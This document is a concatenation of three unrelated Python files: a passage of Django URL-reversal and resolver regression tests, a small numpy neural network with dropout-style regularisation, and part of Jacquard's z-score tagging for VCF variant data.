('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Regression for #9038
# These views are resolved by method name. Each method is deployed twice -
# once with an explicit argument, and once using the default value on
# the method. This is potentially ambiguous, as you have to pick the
# correct view for the arguments provided.
('kwargs_view', '/arg_view/', [], {}),
('kwargs_view', '/arg_view/10/', [], {'arg1':10}),
('regressiontests.urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/', [], {}),
('regressiontests.urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/10/', [], {'arg1':10}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
)
class NoURLPatternsTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.no_urls'
def test_no_urls_exception(self):
"""
RegexURLResolver should raise an exception when no urlpatterns exist.
"""
resolver = RegexURLResolver(r'^$', self.urls)
self.assertRaisesMessage(ImproperlyConfigured,
"The included urlconf regressiontests.urlpatterns_reverse.no_urls "\
"doesn't have any patterns in it", getattr, resolver, 'url_patterns')
class URLPatternReverse(TestCase):
urls = 'regressiontests.urlpatterns_reverse.urls'
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(expected, NoReverseMatch)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
self.assertRaises(NoReverseMatch, reverse, None)
class ResolverTests(unittest.TestCase):
def test_non_regex(self):
"""
Verifies that we raise a Resolver404 if what we are resolving doesn't
meet the basic requirements of a path to match - i.e., at the very
least, it matches the root pattern '^/'. We must never return None
from resolve, or we will get a TypeError further down the line.
Regression for #10834.
"""
self.assertRaises(Resolver404, resolve, '')
self.assertRaises(Resolver404, resolve, 'a')
self.assertRaises(Resolver404, resolve, '\\')
self.assertRaises(Resolver404, resolve, '.')
def test_404_tried_urls_have_names(self):
"""
Verifies that the list of URLs that come back from a Resolver404
exception contains a list in the right format for printing out in
the DEBUG 404 page with both the patterns and URL names, if available.
"""
urls = 'regressiontests.urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a non-existent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/non-existent-url')
url_types_names = [
[{'type': RegexURLPattern, 'name': 'named-url1'}],
[{'type': RegexURLPattern, 'name': 'named-url2'}],
[{'type': RegexURLPattern, 'name': None}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url3'}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url4'}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': None}],
[{'type': RegexURLResolver}, {'type': RegexURLResolver}],
]
try:
resolve('/included/non-existent-url', urlconf=urls)
self.fail('resolve did not raise a 404')
except Resolver404 as e:
# make sure we at least matched the root ('/') url resolver:
self.assertTrue('tried' in e.args[0])
tried = e.args[0]['tried']
self.assertEqual(len(e.args[0]['tried']), len(url_types_names), 'Wrong number of tried URLs returned. Expected %s, got %s.' % (len(url_types_names), len(e.args[0]['tried'])))
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
self.assertTrue(isinstance(t, e['type']), '%s is not an instance of %s' % (t, e['type']))
if 'name' in e:
if not e['name']:
self.assertTrue(t.name is None, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(t.name, e['name'], 'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name))
class ReverseLazyTest(TestCase):
urls = 'regressiontests.urlpatterns_reverse.reverse_lazy_urls'
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=301)
def test_user_permission_with_lazy_reverse(self):
user = User.objects.create_user('alfred', '[email protected]', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.login(username='alfred', password='testpw')
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
class ReverseShortcutTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.urls'
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj(object):
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertTrue(isinstance(res, HttpResponseRedirect))
self.assertEqual(res['Location'], '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertTrue(isinstance(res, HttpResponsePermanentRedirect))
self.assertEqual(res['Location'], '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res['Location'], '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res['Location'], '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res['Location'], '/headlines/2008.02.17/')
self.assertRaises(NoReverseMatch, redirect, 'not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res['Location'], '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res['Location'], 'http://example.com/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res['Location'], '/absolute_arg_view/')
self.assertRaises(NoReverseMatch, redirect, absolute_kwargs_view, wrong_argument=None)
class NamespaceTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.namespace_urls'
def test_ambiguous_object(self):
"Names deployed via dynamic URL objects that require namespaces can't be resolved"
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view')
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', args=[37,42])
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', kwargs={'arg1':42, 'arg2':37})
def test_ambiguous_urlpattern(self):
"Names deployed via dynamic URL objects that require namespaces can't be resolved"
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing')
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', args=[37,42])
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', kwargs={'arg1':42, 'arg2':37})
def test_non_existent_namespace(self):
"Non-existent namespaces raise errors"
self.assertRaises(NoReverseMatch, reverse, 'blahblah:urlobject-view')
self.assertRaises(NoReverseMatch, reverse, 'test-ns1:blahblah:urlobject-view')
def test_normal_name(self):
"Normal lookups work as expected"
self.assertEqual('/normal/', reverse('normal-view'))
self.assertEqual('/normal/37/42/', reverse('normal-view', args=[37,42]))
self.assertEqual('/normal/42/37/', reverse('normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/+%5C$*/', reverse('special-view'))
def test_simple_included_name(self):
"Normal lookups work on names included from other patterns"
self.assertEqual('/included/normal/', reverse('inc-normal-view'))
self.assertEqual('/included/normal/37/42/', reverse('inc-normal-view', args=[37,42]))
self.assertEqual('/included/normal/42/37/', reverse('inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/included/+%5C$*/', reverse('inc-special-view'))
def test_namespace_object(self):
"Dynamic URL objects can be found using a namespace"
self.assertEqual('/test1/inner/', reverse('test-ns1:urlobject-view'))
self.assertEqual('/test1/inner/37/42/', reverse('test-ns1:urlobject-view', args=[37,42]))
self.assertEqual('/test1/inner/42/37/', reverse('test-ns1:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/test1/inner/+%5C$*/', reverse('test-ns1:urlobject-special-view'))
def test_embedded_namespace_object(self):
"Namespaces can be installed anywhere in the URL pattern tree"
self.assertEqual('/included/test3/inner/', reverse('test-ns3:urlobject-view'))
self.assertEqual('/included/test3/inner/37/42/', reverse('test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/included/test3/inner/42/37/', reverse('test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/included/test3/inner/+%5C$*/', reverse('test-ns3:urlobject-special-view'))
def test_namespace_pattern(self):
"Namespaces can be applied to include()'d urlpatterns"
self.assertEqual('/ns-included1/normal/', reverse('inc-ns1:inc-normal-view'))
self.assertEqual('/ns-included1/normal/37/42/', reverse('inc-ns1:inc-normal-view', args=[37,42]))
self.assertEqual('/ns-included1/normal/42/37/', reverse('inc-ns1:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/+%5C$*/', reverse('inc-ns1:inc-special-view'))
def test_namespace_pattern_with_variable_prefix(self):
"When using a include with namespaces when there is a regex variable in front of it"
self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42}))
self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', args=[42]))
self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42, 'arg1': 37, 'arg2': 4}))
self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', args=[42, 37, 4]))
self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', kwargs={'outer':42}))
self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', args=[42]))
def test_multiple_namespace_pattern(self):
"Namespaces can be embedded"
self.assertEqual('/ns-included1/test3/inner/', reverse('inc-ns1:test-ns3:urlobject-view'))
self.assertEqual('/ns-included1/test3/inner/37/42/', reverse('inc-ns1:test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/ns-included1/test3/inner/42/37/', reverse('inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:test-ns3:urlobject-special-view'))
def test_nested_namespace_pattern(self):
"Namespaces can be nested"
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view'))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/37/42/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/42/37/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view'))
def test_app_lookup_object(self):
"A default application namespace can be used for lookup"
self.assertEqual('/default/inner/', reverse('testapp:urlobject-view'))
self.assertEqual('/default/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42]))
self.assertEqual('/default/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/default/inner/+%5C$*/', reverse('testapp:urlobject-special-view'))
def test_app_lookup_object_with_default(self):
"A default application namespace is sensitive to the 'current' app can be used for lookup"
self.assertEqual('/included/test3/inner/', reverse('testapp:urlobject-view', current_app='test-ns3'))
self.assertEqual('/included/test3/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42], current_app='test-ns3'))
self.assertEqual('/included/test3/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='test-ns3'))
self.assertEqual('/included/test3/inner/+%5C$*/', reverse('testapp:urlobject-special-view', current_app='test-ns3'))
def test_app_lookup_object_without_default(self):
"An application namespace without a default is sensitive to the 'current' app can be used for lookup"
self.assertEqual('/other2/inner/', reverse('nodefault:urlobject-view'))
self.assertEqual('/other2/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42]))
self.assertEqual('/other2/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/other2/inner/+%5C$*/', reverse('nodefault:urlobject-special-view'))
self.assertEqual('/other1/inner/', reverse('nodefault:urlobject-view', current_app='other-ns1'))
self.assertEqual('/other1/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42], current_app='other-ns1'))
self.assertEqual('/other1/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='other-ns1'))
self.assertEqual('/other1/inner/+%5C$*/', reverse('nodefault:urlobject-special-view', current_app='other-ns1'))
def test_special_chars_namespace(self):
self.assertEqual('/+%5C$*/included/normal/', reverse('special:inc-normal-view'))
self.assertEqual('/+%5C$*/included/normal/37/42/', reverse('special:inc-normal-view', args=[37,42]))
self.assertEqual('/+%5C$*/included/normal/42/37/', reverse('special:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/+%5C$*/included/+%5C$*/', reverse('special:inc-special-view'))
def test_namespaces_with_variables(self):
"Namespace prefixes can capture variables: see #15900"
self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', kwargs={'outer': '70'}))
self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', kwargs={'outer':'78', 'extra':'foobar'}))
self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', args=['70']))
self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', args=['78','foobar']))
class RequestURLconfTests(TestCase):
def setUp(self):
self.root_urlconf = settings.ROOT_URLCONF
self.middleware_classes = settings.MIDDLEWARE_CLASSES
settings.ROOT_URLCONF = urlconf_outer.__name__
def tearDown(self):
settings.ROOT_URLCONF = self.root_urlconf
settings.MIDDLEWARE_CLASSES = self.middleware_classes
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, 'outer:/test/me/,'
'inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
def test_urlconf_overridden(self):
settings.MIDDLEWARE_CLASSES += (
'%s.ChangeURLconfMiddleware' % middleware.__name__,
)
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, 'outer:,inner:/second_test/')
def test_urlconf_overridden_with_null(self):
settings.MIDDLEWARE_CLASSES += (
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
)
self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')
class ErrorHandlerResolutionTests(TestCase):
"""Tests for handler404 and handler500"""
def setUp(self):
from django.core.urlresolvers import RegexURLResolver
urlconf = 'regressiontests.urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'regressiontests.urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = RegexURLResolver(r'^$', urlconf)
self.callable_resolver = RegexURLResolver(r'^$', urlconf_callables)
def test_named_handlers(self):
from .views import empty_view
handler = (empty_view, {})
self.assertEqual(self.resolver.resolve404(), handler)
self.assertEqual(self.resolver.resolve500(), handler)
def test_callable_handlers(self):
from .views import empty_view
handler = (empty_view, {})
self.assertEqual(self.callable_resolver.resolve404(), handler)
self.assertEqual(self.callable_resolver.resolve500(), handler)
class DefaultErrorHandlerTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.urls_without_full_import'
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
try:
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
except AttributeError:
self.fail("Shouldn't get an AttributeError due to undefined 404 handler")
try:
self.assertRaises(ValueError, self.client.get, '/bad_view/')
except AttributeError:
self.fail("Shouldn't get an AttributeError due to undefined 500 handler")
class NoRootUrlConfTests(TestCase):
"""Tests for handler404 and handler500 if urlconf is None"""
urls = None
def test_no_handler_exception(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')
class ResolverMatchTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.namespace_urls'
def test_urlpattern_resolve(self):
for path, name, app_name, namespace, func, args, kwargs in resolve_test_data:
# Test legacy support for extracting "function, args, kwargs"
match_func, match_args, match_kwargs = resolve(path)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# Test ResolverMatch capabilities.
match = resolve(path)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, name)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.func, func)
# ... and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
class ErroneousViewTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.erroneous_urls'
def test_erroneous_resolve(self):
self.assertRaises(ImportError, self.client.get, '/erroneous_inner/')
self.assertRaises(ImportError, self.client.get, '/erroneous_outer/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_inner/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_outer/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/uncallable/')
|
|
import numpy as np
import NeuralNetworkUtilities as utilities
class BaseLayer(object):
def __init__(self, n_nodes, activation, knockout_survial=None):
# the number of nodes for this layer...
self.n_nodes = n_nodes
self.n_input_edges = None
# the upstream layer, used for backpropagation...
self.upstream_layer = None
# non-linear activation function for each node...
if activation in ['logistic', 'tanh', 'ReLU', 'LReLU']:
if activation == 'logistic':
self.func = utilities.logistic
self.dfdz_func = utilities.dfdz_logistic
elif activation == 'tanh':
self.func = utilities.tanh
self.dfdz_func = utilities.dfdz_tanh
elif activation == 'ReLU':
self.func = utilities.ReLU
self.dfdz_func = utilities.dfdz_ReLU
elif activation == 'LReLU':
self.func = utilities.LReLU
self.dfdz_func = utilities.dfdz_LReLU
else:
raise RuntimeError('%s not supported activation func' % activation)
# survival rate for node values (knockout regularization)...
self.knockout_survial = knockout_survial
# learning rate for gradient descent...
self.learning_rate = None
# number of examples in the training set...
self.n_data_sets = None
# parameters for each layer, i.e. vectorized for each node in layer
self.W = None
self.b = None
self.A = None
self.Z = None
# filter for knockout regularization...
self.F = None
self.dW = None
self.db = None
self.dA = None
self.dZ = None
def initialize_layer(self, n_input_edges, n_data_sets, learning_rate, scalar=0.01):
self.n_input_edges = n_input_edges
self.n_data_sets = n_data_sets
self.learning_rate = learning_rate
self.W = np.random.randn(self.n_nodes, self.n_input_edges) * scalar
self.b = np.zeros((self.n_nodes, 1))
def set_upstream_layer(self, layer):
self.upstream_layer = layer
def calculate_Z(self):
pass
def calculate_A(self, prediction):
self.A = self.func(self.Z)
if self.knockout_survial and not prediction:
self.F = np.random.random(size=(self.n_nodes, self.n_data_sets))
self.F = self.F < self.knockout_survial
self.A = np.multiply(self.A, self.F) / self.knockout_survial
def calculate_gradients(self):
pass
def update_parameters(self, eta=None):
self.W -= self.learning_rate * self.dW
if eta:
self.W = (1.0 - eta) * self.W
self.b -= self.learning_rate * self.db
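# Note on the knockout (dropout-style) filter applied in calculate_A below:
# each node survives with probability p = knockout_survial, and the surviving
# activations are divided by p ("inverted dropout"), so E[A] is unchanged and
# no rescaling is needed at prediction time. Hypothetical numbers: with
# p = 0.8 and a = 1.0, a surviving node contributes 1.0 / 0.8 = 1.25, and the
# expected contribution is 0.8 * 1.25 = 1.0.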
class InputLayer(BaseLayer):
def __init__(self, n_nodes, activation, knockout_survial=None):
super(InputLayer, self).__init__(n_nodes, activation, knockout_survial)
def calculate_Z(self, X):
self.Z = np.dot(self.W, X) + self.b
def calculate_gradients(self, X):
self.dZ = np.multiply(self.dA, self.dfdz_func(self.Z))
self.dW = np.dot(self.dZ, X.transpose()) / self.n_data_sets
# inner product with unity matrix is a sum over the rows (n,m) to (n,1)
self.db = np.sum(self.dZ, axis=1, keepdims=True) / self.n_data_sets
class HiddenLayer(BaseLayer):
def __init__(self, n_nodes, activation, knockout_survial=None):
super(HiddenLayer, self).__init__(n_nodes, activation, knockout_survial)
def calculate_Z(self):
self.Z = np.dot(self.W, self.upstream_layer.A) + self.b
def calculate_gradients(self):
self.dZ = np.multiply(self.dA, self.dfdz_func(self.Z))
self.dW = np.dot(self.dZ, self.upstream_layer.A.transpose()) / self.n_data_sets
# inner product with unity matrix is a sum over the rows (n,m) to (n,1)
self.db = np.sum(self.dZ, axis=1, keepdims=True) / self.n_data_sets
# inject the dA parameter into the upstream layer...
self.upstream_layer.dA = np.dot(self.W.transpose(), self.dZ)
class LogisticOutputLayer(BaseLayer):
def __init__(self):
super(LogisticOutputLayer, self).__init__(1, 'logistic')
def calculate_Z(self):
self.Z = np.dot(self.W, self.upstream_layer.A) + self.b
def calculate_gradients(self, Y):
self.dA = -1.0 * (np.divide(Y, self.A) - np.divide((1 - Y), (1 - self.A)))
self.dZ = np.multiply(self.dA, self.dfdz_func(self.Z))
self.dW = np.dot(self.dZ, self.upstream_layer.A.transpose()) / self.n_data_sets
# inner product with unity matrix is a sum over the rows (n,m) to (n,1)
self.db = np.sum(self.dZ, axis=1, keepdims=True) / self.n_data_sets
# inject the dA parameter into the upstream layer...
self.upstream_layer.dA = np.dot(self.W.transpose(), self.dZ)
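# Note on LogisticOutputLayer.calculate_gradients above: for a sigmoid output
# with binary cross-entropy loss, dA = -(Y/A - (1-Y)/(1-A)) combined with
# dA/dZ = A*(1-A) simplifies algebraically to dZ = A - Y. The explicit
# two-step form used here computes the same quantity while keeping the layer
# interface uniform across layer types.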
class ArtificialNeuralNetwork(object):
def __init__(self, L2=None):
self.is_configured = False
self.L2 = L2
self.learning_rate = None
self.layers = []
self.history = []
def add_layer(self, layer):
self.layers.append(layer)
def fit(self, X, Y, n_iter=1000, learning_rate=0.01):
self.learning_rate = learning_rate
if not self.is_configured:
self._configure_layers(X)
self.is_configured = True
for i in range(n_iter):
self._feed_forward(X, prediction=False)
self._calculate_cost(Y)
self._backprop(X, Y)
def predict(self, X):
n, m = X.shape
self._feed_forward(X, prediction=True)
return (self.layers[-1].A > 0.5).reshape(1, m)
def error(self, X, Y):
P = self.predict(X)
# fraction of misclassified examples...
return np.mean(P != Y)
def _configure_layers(self, X):
n, m = X.shape
for i, layer in enumerate(self.layers):
if isinstance(layer, InputLayer):
layer.initialize_layer(n, m, self.learning_rate)
else:
upstream = self.layers[i-1]
layer.initialize_layer(upstream.n_nodes, m, self.learning_rate)
layer.set_upstream_layer(upstream)
def _feed_forward(self, X, prediction):
for i, layer in enumerate(self.layers):
if isinstance(layer, InputLayer):
layer.calculate_Z(X)
else:
layer.calculate_Z()
layer.calculate_A(prediction)
def _calculate_cost(self, Y):
A = self.layers[-1].A
n, m = Y.shape
cost = np.sum(np.multiply(Y, np.log(A)))\
+ np.sum(np.multiply((1-Y), (np.log(1-A))))
self.history.append(-1.0 * cost / m)
def _backprop(self, X, Y):
for i, layer in enumerate(reversed(self.layers)):
if isinstance(layer, LogisticOutputLayer):
layer.calculate_gradients(Y)
elif isinstance(layer, InputLayer):
layer.calculate_gradients(X)
elif isinstance(layer, HiddenLayer):
layer.calculate_gradients()
for layer in self.layers:
layer.update_parameters(self.L2)
if __name__ == '__main__':
import classifier_utilities as clf_utils
import matplotlib.pyplot as plt
## generate data
d, m = 2, 1000
X = np.random.randn(d, m)
Y = (np.sqrt(np.square(X[0]) + np.square(X[1])) > 1.0).reshape(1, m)
i = np.squeeze(Y)
## show data
plt.figure()
plt.plot(X[0][i], X[1][i], 'ob')
plt.plot(X[0][~i], X[1][~i], 'or')
# plt.show()
## create ANN...
ann = ArtificialNeuralNetwork(L2=0.0)
ann.add_layer(InputLayer(n_nodes=3, activation='tanh', knockout_survial=1.0))
ann.add_layer(LogisticOutputLayer())
ann.fit(X, Y, learning_rate=0.05, n_iter=9000)
print('training error: %s' % ann.error(X, Y))
## show results
clf_utils.plot_gradient_descent_history(ann, display=False)
clf_utils.plot_2D_decision_boundary(ann, X, Y, display=True)
|
|
"""Classes to summarize zscore data for a sample-variant.
A collection of individual Tag classes hold the metaheader and logic to
transform Jacquard-standardized VcfRecords.
These transforms combine info from a single sample-variant tag with aggregate
info about all sample-variants in the VCF. For example, the zscore of a
sample-variant depth is:
(my_depth - average of all depths) / stddev of all depths
For this reason, zscore values require the full VCF as one of the inputs.
"""
from __future__ import print_function, absolute_import, division
import math
import jacquard.utils.utils as utils
import jacquard.variant_caller_transforms.common_tags as common_tags
_JQ_SUMMARY_TAG = "JQ_SUMMARY_"
SUMMARY_TAG = "SUMMARY"
SUMMARY_ALLELE_FREQ_ZSCORE = common_tags.TagType("AF_ZSCORE", "Float", "1")
SUMMARY_DEPTH_ZSCORE = common_tags.TagType("DP_ZSCORE", "Float", "1")
#TODO: (cgates): Define tag ids as public, class-level constants so dependent
# tags can reference them directly
class _AlleleFreqZScoreTag(common_tags.AbstractJacquardTag):
#TODO: (jebene) change the way allelefreqzscore understands the tags
#it's dependent on (_range_tag should not be defined here)
_RANGE_TAG = "{0}AF_RANGE".format(_JQ_SUMMARY_TAG)
def __init__(self, vcf_reader):
super(self.__class__,
self).__init__(SUMMARY_TAG,
SUMMARY_ALLELE_FREQ_ZSCORE,
('Concordance of reported allele frequencies '
'across callers: [(this AF range - mean AF range)'
'/standard dev(all AF ranges)]. Values with null '
'or missing AF range will be assigned zscore of '
'\'.\'; for multi-valued ranges, zscore is of '
'largest range.'))
self.tag = _ZScoreTag(self.tag_id,
self.metaheader,
self._RANGE_TAG,
vcf_reader)
@property
def metaheaders(self):
return self.tag.metaheaders
def add_tag_values(self, vcf_record):
self.tag.add_tag_values(vcf_record)
class _DepthZScoreTag(common_tags.AbstractJacquardTag):
#TODO: (jebene) change the way depthzscore understands the tags
#it's dependent on (_range_tag should not be defined here)
_RANGE_TAG = "{0}DP_RANGE".format(_JQ_SUMMARY_TAG)
def __init__(self, vcf_reader):
super(self.__class__,
self).__init__(SUMMARY_TAG,
SUMMARY_DEPTH_ZSCORE,
('Concordance of reported depth across callers: '
'[(this DP range - mean DP range)/standard '
'dev(all DP ranges)]. Values with null or '
'missing DP range will be assigned zscore '
'of \'.\'.'))
self.tag = _ZScoreTag(self.tag_id,
self.metaheader,
self._RANGE_TAG,
vcf_reader)
@property
def metaheaders(self):
return self.tag.metaheaders
def add_tag_values(self, vcf_record):
self.tag.add_tag_values(vcf_record)
class _ZScoreTag(object):
'''Utility tag to add zscore for dependent tag (e.g. depth or allele freq)
Given a dependent tag and a vcf reader, calculates mean and stdev on
construction and then adds zscores for each value.
'''
_EXECUTION_FORMAT = "##jacquard.summarize.{0}.{1}_{2}={3}"
_MAX_PRECISION = 13
def __init__(self,
tag_id,
metaheader,
dependent_tag_id,
vcf_reader):
self._tag_id = tag_id
self._dependent_tag_id = dependent_tag_id
self._mean, self._stdev = self._init_population_stats(vcf_reader,
dependent_tag_id)
self._metaheaders = self._init_metaheaders(tag_id,
metaheader,
dependent_tag_id,
self._mean,
self._stdev)
def _init_metaheaders(self,
tag_id,
metaheader,
dependent_tag_id,
mean,
stdev):
#pylint: disable=too-many-arguments
metaheaders = []
metaheaders.append(self._EXECUTION_FORMAT.format(tag_id,
dependent_tag_id,
"mean",
repr(mean)))
metaheaders.append(self._EXECUTION_FORMAT.format(tag_id,
dependent_tag_id,
"stdev",
repr(stdev)))
metaheaders.append(metaheader)
return tuple(metaheaders)
@property
def metaheaders(self):
return self._metaheaders
def _ok_to_add_tag_values(self, vcf_record):
return self._stdev and self._dependent_tag_id in vcf_record.format_tags
@staticmethod
def _zscore_as_str(zscore):
if zscore == ".":
return zscore
else:
return utils.round_digits(repr(zscore))
def add_tag_values(self, vcf_record):
if not self._ok_to_add_tag_values(vcf_record):
return
sample_values = {}
for sample_name in vcf_record.sample_tag_values:
zscore = "."
tag_values = vcf_record.sample_tag_values[sample_name]
value = self._get_dependent_value(tag_values,
self._dependent_tag_id)
if value is not None:
zscore = (value - self._mean) / self._stdev
sample_values[sample_name] = self._zscore_as_str(zscore)
vcf_record.add_sample_tag_value(self._tag_id,
sample_values)
@staticmethod
def _get_dependent_value(tag_values, dependent_tag_id):
'''Extract (float) value of dependent tag or None if absent.'''
try:
values = tag_values[dependent_tag_id].split(",")
return max([float(value) for value in values])
except KeyError:
return None
except ValueError:
return None
def _init_population_stats(self, vcf_reader, dependent_tag_id):
'''Derive mean and stdev.
Adapted from online variance algorithm from Knuth, The Art of Computer
Programming, volume 2
Returns: mean and stdev when len(values) > 1, otherwise (None, None)
Values rounded to _MAX_PRECISION to ameliorate discrepancies between
python versions.'''
#pylint: disable=invalid-name
n = 0
mean = 0
M2 = 0
try:
vcf_reader.open()
for vcf_record in vcf_reader.vcf_records():
for tag_values in vcf_record.sample_tag_values.values():
value = self._get_dependent_value(tag_values,
dependent_tag_id)
if value is not None:
n += 1
delta = value - mean
mean += delta / n
M2 += delta * (value - mean)
finally:
vcf_reader.close()
mean = round(mean, self._MAX_PRECISION)
stdev = 0
if n == 0:
mean = None
stdev = None
elif n >= 2:
variance = M2/n
stdev = round(math.sqrt(variance), self._MAX_PRECISION)
return mean, stdev
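# Illustrative sketch (not part of Jacquard): the same online mean/stdev
# update used in _init_population_stats, shown standalone; the helper name
# and example values are hypothetical, and variance is population variance
# (M2/n) to match the code above.
def _online_mean_stdev_sketch(values):
    n, mean, M2 = 0, 0.0, 0.0
    for value in values:
        n += 1
        delta = value - mean
        mean += delta / n
        M2 += delta * (value - mean)
    if n == 0:
        return None, None
    return mean, math.sqrt(M2 / n) if n >= 2 else 0
# e.g. _online_mean_stdev_sketch([2.0, 4.0, 6.0]) == (4.0, sqrt(8/3) ~= 1.633)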
class ZScoreCaller(object):
